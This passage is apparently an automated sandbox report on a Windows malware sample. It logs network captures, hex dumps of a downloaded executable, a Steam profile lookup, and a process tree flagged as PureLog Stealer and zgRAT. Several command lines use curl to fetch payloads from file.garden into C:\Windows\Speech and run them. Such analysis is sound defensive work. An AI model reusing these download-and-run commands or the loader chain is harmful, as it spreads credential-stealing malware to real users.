                                                                                                                                                                        2024-09-30 16:19:12 UTC104OUTGET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1
                                                                                                                                                                        Host: file.garden
                                                                                                                                                                        User-Agent: curl/7.83.1
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        2024-09-30 16:19:12 UTC822INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 30 Sep 2024 16:19:12 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 370176
                                                                                                                                                                        Connection: close
                                                                                                                                                                        x-powered-by: Express
                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                        content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                        last-modified: Sun, 22 Sep 2024 19:01:04 GMT
                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                        Age: 681395
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AnPWeW%2FRMXheSqTp3Tvn7%2B7isAvLYDfRfJsECkkB6arC2LIEzquowJWzlSLpaCP%2FLlt7Z6%2BdcMaS%2BJSe8C3CAR6dPE3Hgz%2F031FYOPDiY9AZLPBK%2BLdjeKa7qRp0Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8cb58882ae650c8a-EWR
                                                                                                                                                                        2024-09-30 16:19:12 UTC547INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33
                                                                                                                                                                        Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ|m&.y;KR7Skm?8ID&!0%N!\\L^0\j|MM;*qUO!'%. dEuQ-w$IX0df$|(gEN3
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: bc d3 bf ab bd d7 a6 cf c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7
                                                                                                                                                                        Data Ascii: 2[5CX",_:k$J48Q3e,|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 36 37 3f d2 7d 27 73 de f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d
                                                                                                                                                                        Data Ascii: 67?}'s}> :?mQEB_|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 61 48 51 77 b6 a9 db 13 c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b
                                                                                                                                                                        Data Ascii: aHQw_(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 40 23 8b 17 c6 46 95 ba 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15
                                                                                                                                                                        Data Ascii: @#FGB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 0e 6c a0 99 eb c9 ae 9b 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a
                                                                                                                                                                        Data Ascii: l3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}j
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 76 07 31 2b 17 37 77 3c 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4
                                                                                                                                                                        Data Ascii: v1+7w<gxJfS{~ZsN\pVw`d[rcEDb=B|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA|yUsmje|\<_td $}d4Nl6*f
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 22 0b b1 b6 50 c9 c6 39 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19
                                                                                                                                                                        Data Ascii: "P9A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<*:eyy}VTZZ=,$Gz*\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~
                                                                                                                                                                        2024-09-30 16:19:12 UTC1369INData Raw: 7b a7 60 72 02 40 88 2f e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0
                                                                                                                                                                        Data Ascii: {`r@/.h!L3y8s6}*.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</|L|[2}cr"DeN)vv_eH*4jnm$WS_k5c:TiNSRjX*'TD|K{


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.765264104.102.49.2544431512C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-09-30 16:19:15 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                        2024-09-30 16:19:16 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Date: Mon, 30 Sep 2024 16:19:16 GMT
                                                                                                                                                                        Content-Length: 25330
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: sessionid=b3a5e989a480efb8300c17c0; Path=/; Secure; SameSite=None
                                                                                                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                        2024-09-30 16:19:16 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                        2024-09-30 16:19:16 UTC10816INData Raw: 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 62 75 6c 67 61 72 69 61 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 62 75 6c 67 61 72 69 61 6e 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e d0 91 d1 8a d0 bb d0 b3 d0 b0 d1 80 d1 81 d0 ba d0 b8 20 28 42 75 6c 67 61 72 69 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 63 7a 65 63 68 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 63 7a 65 63 68 27 20 29 3b 20 72 65 74
                                                                                                                                                                        Data Ascii: ss="popup_menu_item tight" href="?l=bulgarian" onclick="ChangeLanguage( 'bulgarian' ); return false;"> (Bulgarian)</a><a class="popup_menu_item tight" href="?l=czech" onclick="ChangeLanguage( 'czech' ); ret


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:12:19:04
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\gh3zRWl4or.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\gh3zRWl4or.exe"
                                                                                                                                                                        Imagebase:0x7ff674140000
                                                                                                                                                                        File size:637'440 bytes
                                                                                                                                                                        MD5 hash:B172FEB05A0515D00442F6EF11B167BF
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:1
                                                                                                                                                                        Start time:12:19:04
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:12:19:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        Imagebase:0x7ff722710000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:5
                                                                                                                                                                        Start time:12:19:07
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\curl.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        Imagebase:0x7ff6b9420000
                                                                                                                                                                        File size:530'944 bytes
                                                                                                                                                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:12:19:10
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Speech\kdmapper.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Speech\kdmapper.exe"
                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                        File size:2'284'739 bytes
                                                                                                                                                                        MD5 hash:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 68%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:12:19:10
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                        Imagebase:0x7ff722710000
                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:12:19:10
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\System32\curl.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                                                                                                                                                        Imagebase:0xfd0000
                                                                                                                                                                        File size:530'944 bytes
                                                                                                                                                                        MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:9
                                                                                                                                                                        Start time:12:19:12
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                                                                                                                                                        Imagebase:0xb10000
                                                                                                                                                                        File size:147'456 bytes
                                                                                                                                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:12:19:12
                                                                                                                                                                        Start date:30/09/2024
                                                                                                                                                                        Path:C:\Windows\Speech\physmeme.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\Speech\physmeme.exe"
                                                                                                                                                                        Imagebase:0x580000
                                                                                                                                                                        File size:370'176 bytes
                                                                                                                                                                        MD5 hash:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 61%, ReversingLabs
